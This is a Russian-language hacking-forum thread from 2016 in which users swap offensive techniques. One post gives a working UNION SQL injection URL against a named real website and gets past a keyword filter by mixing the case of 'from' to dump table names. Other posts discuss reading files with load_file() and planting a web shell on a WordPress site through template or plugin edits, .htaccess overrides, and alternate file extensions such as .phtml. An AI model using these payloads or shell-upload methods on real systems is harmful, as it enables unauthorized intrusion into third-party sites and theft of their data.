HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1111  
Старый 07.02.2016, 14:16
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от Улыбайся  

тогда когда какой вариант? создать пользователя который сможет? CREATE USER
Как вариант попробывать вот эту тему:

https://rdot.org/forum/showthread.php?t=741

но это только лишь читалка...

P.S: Читалку тестировали? load_file()
 
Ответить с цитированием

  #1112  
Старый 07.02.2016, 14:18
ArmusIAm
Познающий
Регистрация: 08.01.2016
Сообщений: 33
С нами: 5445686

Репутация: 0
По умолчанию

http://www.enec.ru/Index.phtml?Name=...ct+1,2,3,4,5--

Хостер фильтрует "from", чем можно заменить или обойти фильтр?
 
Ответить с цитированием

  #1113  
Старый 07.02.2016, 18:29
private_static
Участник форума
Регистрация: 19.05.2015
Сообщений: 117
С нами: 5782646

Репутация: 22
По умолчанию

Цитата:
Сообщение от ArmusIAm  

http://www.enec.ru/Index.phtml?Name=...ct+1,2,3,4,5--
Хостер фильтрует "from", чем можно заменить или обойти фильтр?
Код:
http://www.enec.ru/Index.phtml?Name=News&newsID=-40+union+select+1,2,TABLE_NAME,4,5+fRoM+information_schema.tables
 
Ответить с цитированием

  #1114  
Старый 07.02.2016, 18:49
Улыбайся
Познающий
Регистрация: 23.10.2011
Сообщений: 71
С нами: 7660406

Репутация: 3
По умолчанию

Цитата:
Сообщение от winstrool  

Как вариант попробывать вот эту тему:
https://rdot.org/forum/showthread.php?t=741
но это только лишь читалка...
P.S: Читалку тестировали?
load_file()
ок гляну.
 
Ответить с цитированием

  #1115  
Старый 07.02.2016, 21:51
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию

какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы
 
Ответить с цитированием

  #1116  
Старый 08.02.2016, 01:51
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от Br@!ns  

какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы
темплейты, плагины..
 
Ответить с цитированием

  #1117  
Старый 08.02.2016, 12:37
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию

Цитата:
Сообщение от Konqi  

темплейты, плагины..
-

само собой там тоже без прав)
 
Ответить с цитированием

  #1118  
Старый 08.02.2016, 12:38
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию

Цитата:
Сообщение от Br@!ns  

-
само собой там тоже без прав)
Правка .htaccess ?

Установка нового .htaccess в твою папку со своими привилегиями
 
Ответить с цитированием

  #1119  
Старый 08.02.2016, 12:43
Saint-Sky
Участник форума
Регистрация: 14.07.2007
Сообщений: 108
С нами: 9909614

Репутация: 305
По умолчанию

Цитата:
Сообщение от Br@!ns  

какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы
Все расширения пробовал?

А то я встречал такие .хтаксес, что все виды .php - читались как текст, а вот .phtml прокатывал...
 
Ответить с цитированием

  #1120  
Старый 08.02.2016, 13:07
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию

Цитата:
Сообщение от OxoTnik  

Правка .htaccess ?
Установка нового .htaccess в твою папку со своими привилегиями
штака сохраняется как /htaccess, т.е без точки, т.е не работает (гружу через добавление темы)

с расширениями тоже чего то не хочет. shtml шелл так же ничего не показывает
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.